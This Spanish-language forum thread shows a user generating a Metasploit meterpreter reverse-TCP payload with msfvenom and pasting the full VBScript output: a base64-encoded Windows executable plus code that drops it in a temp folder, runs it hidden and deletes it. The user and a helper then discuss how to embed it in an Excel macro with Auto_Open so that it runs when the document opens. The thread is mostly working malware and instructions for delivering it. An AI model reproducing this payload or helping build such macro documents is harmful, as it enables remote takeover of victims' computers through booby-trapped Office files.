Sólo texto | Texto con Imágenes

Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: redferne en Junio 01, 2017, 05:39:41 PM

Título: [SOLUCIONADO] Cómo insertar un paylod en un macro de excel.
Publicado por: redferne en Junio 01, 2017, 05:39:41 PM
salud:
quiero hacer un documento de office y en  macros meter un payload, asi que ejecuto en el metasploit
Código (text) [Seleccionar]
msfvenom -p windows/meterpreter/reverse_tcp -f vbs lhost=192.168.1.43 lport=4050 > shell.txt

me sale un archivo de texto que pone
Código (text) [Seleccionar]

Function HBheqvmVz(RWtxzWoaeQKRGPv)
ruYKqvUZcQdqr = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
RWtxzWoaeQKRGPv & "</B64DECODE>"
Set pMCkLJCo = CreateObject("MSXML2.DOMDocument.3.0")
pMCkLJCo.LoadXML(ruYKqvUZcQdqr)
HBheqvmVz = pMCkLJCo.selectsinglenode("B64DECODE").nodeTypedValue
set pMCkLJCo = nothing
End Function

Function vRIqrmYz()
gLKKiHtF = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALA0s14AAAAAAAAAAOAADwMLAQI4AAIAAAAOAAAAAAAAABAAAAAQAAAAIAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAABAAAAAAgAARjoAAAIAAAAAACAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAAwAABkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAKAAAAAAQAAAAAgAAAAIAAAAAAAAAAAAAAAAAACAAMGAuZGF0YQAAAJAKAAAAIAAAAAwAAAAEAAAAAAAAAAAAAAAAAAAgADDgLmlkYXRhAABkAAAAADAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAwwAAAAAAAAAAAAAAAAAAAAAC4ACBAAP/gkP8lODBAAJCQAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALrNqNSk2ezZdCT0XynJZrkEAoPHBDFXEQNX3EohlR7iwsbe87YZ7pe/xvKwQgYKQSOO73Bj9GQiU34ozxjS2ERs++/t293e7nAdQW2LcqFMRIegiblq8EK12eTng+GPtAJibAwkQyMGf0PCywvK3AgxhFf6zRexMi27/PrcxTk8P7AzPsLDgDwYQRLm6/H+Fj9ndRT049E5CydqRYDGvM/S7BiLgY05cWexWdrYFxL3DSp5kOIHgWBtH/JSMouc3rsVWyCW4vPfGRPaG01DdI3uCIQyO6SBpASRiB/t4IpQP21sPu8+IP9f/5CXtfDPiLXaeCJas9Hbw56pegs11L2HvClzYLQ5ZBE2wXW4NqtxamBDeEtGzIO+1Ap7P+1hStVRHbM5Ut3lU1K1UQABoJ2dNXkIHmwum3aSCevYbXxvHpEDUof6+9I3+5HSZ5Nu/IhTj9fA+xq2o5obk2IDHBC/UpPWQFtS6pZiISsr0TkGDnDTaRyC9qyAcb1WqmmCYAE5CmayD6UmMDFFOCTzevwuxj/Pu/gSQSKuQe82k3XXgBoGlDbg0FhUayoVfJFqhzr+aArVHT5TJOOQ4I8LVDaovHrDYUOE/lxm00TAyQ8NyPsOkSsBTtMe3S39syJkIz89k2jkD0H3ENdy3Ly2P7TKIHltrSU0i2/s+/pKGzvypdOjro6riIwMIL+M+Io0SX5U5sUSEJC0ZttRwDCY4DhFrxjvgoMoyb9bw5VY0RHtmH9GbNxm2ADLk4sclI6P9c9cn7wznfOtJp371jXdPuKo/NG3wvax5iKBnPPr2s0Iz4hBcpuOsPici1fwgbnGkrYhMDTLkfZwX+R+GefWhoHNZUAbe485QxMFnaOYu4mE9GO1jSj8BXl862YINPYcHK8oC5jJ2QHB/p8U9NBr/o80RLdNRdnNSgppjtGh+ccMqi/JnyBqW6EGSVZ6HU4HFU7AMZihkevbIZ6cpp8VW5N8Vlum/mPyuOORvzF30VTx0yY/hatVWs0rpxyLqrJKTbVRHWbNw203v7YmbCNje06younj1jQbnxSZiU5Ef6Hvb4UzKyb75ftK0hX8zOH2/rTe9KnWUr8ayAx+2Pm8otEDyAIVpAAtM3Zvpvnrh7+KhkisEW69ICpFw9OxmXkSY8l8lY7NpwZOT0MYMAJVTuybJ48P2btkf1Ye7jDwWZkQBE4YQ/o6KhFXo2g7QGw0AEvy5D5isEfjN7tHjGU2QsjDdDT47PZlBT0OVygFOlObZHsOz4/e9ncGnfbPiKCOScPpa6vc4bx6SO+Wc22CeEX6doULh/ojTbHQHDaK/fSA8eUGo6NINxBY3xM7DhKSrjNxH7HyvAWGi+ZJel30HbOdxapq6QQw1X6efPzS3QdOqBeaqhbQ0757Tz3qS3Rrg2nlpNmcjS/5woTkaFK5hOHGaikGlP3+2fplll5eI3iHGso/y5WFEGHLl20jvXPi/eFtt0BZhdHI3hfSDIG+MxKzbSLp2/6iUcIfpUqFKzMswEo6uhImsgCmkOOnGmwI8902L/h70bQrlm/yezily9NcpVGGZcRQ18FBoeVtAFq8wyWfXyGCuocHGF+vV4ugN585Nx3LGPRWXF29M/2XFcjYwtWFC3Drgqrr6EbJKo4foekOehJqzvYrnueF+vaWEB7puskXartELH9chIVbX92ljItPYN8RNJh/40ZF8F+8gF9qOCDzhwSIG6sThc+gIkNDpTn+w+RnrKh5j1ukSSakhgjYV4NXyNEZPeAXY0f+t7U5c3n8YP0nWnMKOLb1SC3rpqW7B23zJeLucFDeVQErPH2qcoDh0II8kOuCmAW9FJ/LxW3VpEgEYbnd1Ho+4Gj+4TnnI5ZRfgWlJoF83In7eQ3U0rxjlYnQ4mzvL4BKW/R6UULBk7bVmYTCrn97jvlLwFi5x8g7s+Jq95cx7kI77AW7bWJUe5wmzuzeph66RicQGoc18B76dOKOgiC+Y2Y7puSZbQBUp7+ieYnk1i7qoVmgsvUG9cZXjjg2Eh7nZdNtfRpMLsxBWZUVEHy7auTQLVyiRiuVS+tqp7hdRVzCpjsqpuUorDsgFaBvMTPncuQ6RCt5VTgDBtfH2z9d7u3mlBi1FsayVH1sW37IcjQ3sI0OtFW1YbOx+pTNsL83bd50uT/r7dPia17ZA2JbYdd+KBK2crN1CKQez01RQk1iwnKLDwJxItZo3e338fO3kvc+Xc2GGZMGORFt1C1WUa2CrYhZ1dAy/owgts8KuBoQXR/wM63Fk15XO8Hi52xtJ5/57rU45NN7rQgXTZv8bzFr7iRuCSJHIzZe4NGByAObvgZRqkgedmxxqvE11VJPZWTZ4yG0RsQgd0IM7gumlZSnsyfG/gVBzQ/1yf+CBsOdLNmUahlYbBU67MD90U+PazK4WIP/qB5BRxCebDKSztkLxjqI36csDzaH+41pZgsTr5NCqEnXysQJPLMwOxA81REMYBCGittABJIo464N5OA7LtMugbPfKkcepXt6oXjaif3i00HZCYd9nOaMuyGYmnVFMb/kRwy5hA9QQVOMLq9CVywxCN1lQBrzHaQJSMMv2Jc9/QfCU82E8ktoNpbx6HZQS0Q/dIZ9976XspjnaN0/GloT6a39d0zXjE2z65BdXzTr1FZIq+Hx5SAMAndjyjA+e6YpZNHDQOaFTTpNqbNRN+Vx4pf9vSpL+zsJ475VQH7BVjp+ffYH0GeC5SaXC9dgMlZqCOhRnnfKwAoheMGKM3CpQsZcXRaIXGhpQyqbm0gp4B1ToVQDr5xKu206MGkQwi/7HPnb1OcrpX2grgg7yq4LEePmZo2yc9pHI4vdRCZrk45QthvUQABnHnqPpVqzyIQrywmgIQPcrAdc4KBJ5GtLo4kAZy0T7RTpjlbBt7HwKTMMTdSWKlHM3LVIVhXDDnOu5bOklk777AERhb8sdsaZLm+DtlkF2ZLYmq9Zp+VSpDiL0B4YokeCb4GFchIDvApOUD0Omb6tiZ0cyOqRoS13MXLPS+8jSpcukUaWBf1Mg037N6e0L9RqP12yeZV0yNDVIVFpjK7AfOc6KgkhOgtEDbHbZAkD3sjKBt1fxp0L8Y5yXhRRvzYBbQIY8Z0YfHitm7QIP4XGR5tc+N1S07vUgTvFRcNLC+qehN3m2W1BRRCCFWWS821kEe49SonF/SxnXcNACnR5P++K/Tebx9B3k5yb8ipkPUHx6kgd+VYq2om5W6iCduVWQYYUHlQUVHEW/x7LH4ssFn+zrNsbHBnFxxfIqP2eGOXUpN6+KOZFgeEmjzKoi2lBPUM0YtQurNSsOxR2vsu8Gj0O6/pzocsYlP835zYuYorN+ikqscLqQS8gOJGSSYpffmJAqDmVAjCSU37cr5aM1YoIKHU3qw2rjs/gy7g2V8UGiNfnuEeTiJrjlSanXr4AZghj441UKastLGoDxSBKKhWshCEcWSSFA7PDy62I03EwSFikU8eGHQ+eUvXvAFlO3Wi1dTM7NuiM5a8JRKcWTRdUq7A9nPhw37g9g1vzadGTm4flxSjRRLIW9jb5V/1ypNe+wwjR1VVof5rKYNQwyogfJH5iYBf/9SawatkFP8YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwwAAAAAAAAAAAAAFQwAAA4MAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQDAAAAAAAAAAAAAAQDAAAAAAAACcAEV4aXRQcm9jZXNzAAAAADAAAEtFUk5FTDMyLmRsbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASw1rh9FXOcxgozDxi+2wwejPUPcVdM5CQqUvvSwztIKeMyjEadbrvjJO"
Dim iuweTUwlJJltJMK
Set iuweTUwlJJltJMK = CreateObject("Scripting.FileSystemObject")
Dim PFCHOYHKRHzye
Dim BqzGvVkjr
Set PFCHOYHKRHzye = iuweTUwlJJltJMK.GetSpecialFolder(2)
BqzGvVkjr = PFCHOYHKRHzye & "\" & iuweTUwlJJltJMK.GetTempName()
iuweTUwlJJltJMK.CreateFolder(BqzGvVkjr)
IhhEkXgARszOTcY = BqzGvVkjr & "\" & "PnzcweNZTbJOUL.exe"
Dim mLbevNJqdvsTs
Set mLbevNJqdvsTs = CreateObject("Wscript.Shell")
SflDtBDCMqs = HBheqvmVz(gLKKiHtF)
Set zpmtDkAfuoGNbX = CreateObject("ADODB.Stream")
zpmtDkAfuoGNbX.Type = 1
zpmtDkAfuoGNbX.Open
zpmtDkAfuoGNbX.Write SflDtBDCMqs
zpmtDkAfuoGNbX.SaveToFile IhhEkXgARszOTcY, 2
mLbevNJqdvsTs.run IhhEkXgARszOTcY, 0, true
iuweTUwlJJltJMK.DeleteFile(IhhEkXgARszOTcY)
iuweTUwlJJltJMK.DeleteFolder(BqzGvVkjr)
End Function

vRIqrmYz


se que una parte se pega en el macro y la otra en el documento, pero n me queda claro cual es cual?
tambien creo recordar que para el office 2007 se debia de poner algo al principio algo como "Sub Auto_Open"  y al final "End sub" la verdad que ya no me acuerdo bien
Título: Re:Como insertar un paylod en un macro de excel.
Publicado por: animanegra en Junio 01, 2017, 07:33:04 PM
pues tienes dos funciones y la llamada a la funcion. Aunque para autorunearlas parece que tienes que seguir unos nombres especificos, asi que tendras o cambiar nombre a la segunda funcion o bien hacer una funcion de autoestart que ejecute el nombre de la funcion como tienes abajo del todo pero dentro de la funcion.

Código [Seleccionar]
https://msdn.microsoft.com/en-us/library/office/aa211920(v=office.11).aspx
Título: Re:Como insertar un paylod en un macro de excel.
Publicado por: redferne en Junio 02, 2017, 03:00:52 PM
Ya pero sigo sin poder diferenciar donde empieza y acaba cada parte y cual es cual
Si sabe alguien algún tuto donde vengan ejemplos.....Nada de unicorn....Más bien siguiendo el ejemplo que puse
Título: Re:Como insertar un paylod en un macro de excel.
Publicado por: animanegra en Junio 02, 2017, 03:25:41 PM
Tienes una parte que pone:

Function

y una que pone:

End Function

Todo ese código define una función. En el código tienes dos funciones definidas, una seguida de la otra y abajo del todo una llamada a la segunda funcion. Fijate en el nombre.
Título: Re:Como insertar un paylod en un macro de excel.
Publicado por: redferne en Junio 03, 2017, 02:39:45 AM
Todo ok, gracias
Sólo texto | Texto con Imágenes